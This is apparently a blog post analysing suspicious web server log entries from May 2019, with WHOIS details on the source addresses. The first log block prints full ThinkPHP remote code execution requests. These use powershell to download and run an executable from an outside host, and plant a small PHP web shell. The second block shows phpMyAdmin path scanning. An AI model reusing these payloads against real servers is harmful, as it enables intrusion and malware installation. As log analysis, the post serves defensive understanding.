Web server logs: suspicious HTTPD log entries from 2019-05-22

While going through the web server logs I noticed some access lines absolutely packed with suspicious content, so here is a write-up for the first time in a while.

[22/May/2019:22:06:49] - - 221.231.113.114    "GET /public/index.php?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','%SystemRoot%/Temp/leepozjimljusrb19143.exe');start%20%SystemRoot%/Temp/leepozjimljusrb19143.exe HTTP/1.1" 301 -       "http://116.58.172.107:80/public/index.php?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe
[22/May/2019:22:06:57] - - 221.231.113.114    "GET /public/?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile(http://fid.hognoob.se/download.exe,%SystemRoot%/Temp/leepozjimljusrb19143.exe);start%20%SystemRoot%/Temp/leepozjimljusrb19143.exe HTTP/1.1" 404 24979       "http://116.58.172.107:80/public/index.php?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe
[22/May/2019:22:07:04] - - 221.231.113.114    "GET /public/index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^>hydra.php HTTP/1.1" 301 -       "http://116.58.172.107:80/public/index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo
[22/May/2019:22:07:07] - - 221.231.113.114    "GET /public/?s=/index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20?php%20action%20=%20_GET[xcmd];system(action);?hydra.php HTTP/1.1" 404 24980       "http://116.58.172.107:80/public/index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo
[22/May/2019:22:07:15] - - 221.231.113.114    "GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','%SystemRoot%/Temp/leepozjimljusrb19143.exe');start%20%SystemRoot%/Temp/leepozjimljusrb19143.exe HTTP/1.1" 404 24950       "http://116.58.172.107:80/public/hydra.php?xcmd=cmd.exe

Given the /public and the backslashes, was this aimed at a Windows local share?

The source of the accesses was, as I expected, China.

% Information related to '221.228.0.0/14AS4134'

route:          221.228.0.0/14
descr:          CHINANET jiangsu province network
origin:         AS4134
mnt-by:         MAINT-CHINANET-JS
last-modified:  2019-02-14T06:59:24Z
source:         APNIC

Accesses like the following, on the other hand, happen all the time.

[21/May/2019:17:23:52] - - 118.31.251.34    "GET //scripts/setup.php HTTP/1.1" 301 -       "-"
[21/May/2019:17:23:57] - - 118.31.251.34    "GET //phpMyAdm/scripts/setup.php HTTP/1.1" 301 -       "-"
[21/May/2019:17:24:03] - - 118.31.251.34    "GET //admin/scripts/setup.php HTTP/1.1" 301 -       "-"
[21/May/2019:17:24:09] - - 118.31.251.34    "GET //admin/pma/scripts/setup.php HTTP/1.1" 301 -       "-"
[21/May/2019:17:24:15] - - 118.31.251.34    "GET //admin/phpmyadmin/scripts/setup.php HTTP/1.1" 301 -       "-"
[21/May/2019:17:24:21] - - 118.31.251.34    "GET //db/scripts/setup.php HTTP/1.1" 301 -       "-"
[21/May/2019:17:24:26] - - 118.31.251.34    "GET //dbadmin/scripts/setup.php HTTP/1.1" 301 -       "-"
[21/May/2019:17:24:31] - - 118.31.251.34    "GET //dbdmin/scripts/setup.php HTTP/1.1" 301 -       "-"
[21/May/2019:17:24:36] - - 118.31.251.34    "GET //myadmin/scripts/setup.php HTTP/1.1" 301 -       "-"
[21/May/2019:17:24:41] - - 118.31.251.34    "GET //mysql/scripts/setup.php HTTP/1.1" 301 -       "-"
[21/May/2019:17:24:45] - - 118.31.251.34    "GET //mysqladmin/scripts/setup.php HTTP/1.1" 301 -       "-"
[21/May/2019:17:24:49] - - 118.31.251.34    "GET //typo3/phpmyadmin/scripts/setup.php HTTP/1.1" 301 -       "-"
[21/May/2019:17:24:52] - - 118.31.251.34    "GET //phpadmin/scripts/setup.php HTTP/1.1" 301 -       "-"
[21/May/2019:17:24:56] - - 118.31.251.34    "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 301 -       "-"
[21/May/2019:17:25:01] - - 118.31.251.34    "GET //phpmyadmin1/scripts/setup.php HTTP/1.1" 301 -       "-"
[21/May/2019:17:25:07] - - 118.31.251.34    "GET //phpmyadmin2/scripts/setup.php HTTP/1.1" 301 -       "-"

The source of these accesses is, of course, also China.

% Information related to '118.31.0.0/16AS37963'

route:          118.31.0.0/16
descr:          Addresses from CNNIC
country:        CN
origin:         AS37963
mnt-by:         MAINT-CNNIC-AP
last-modified:  2016-07-20T02:08:05Z
source:         APNIC

Not that it matters much, but I am putting it up here for all to see.
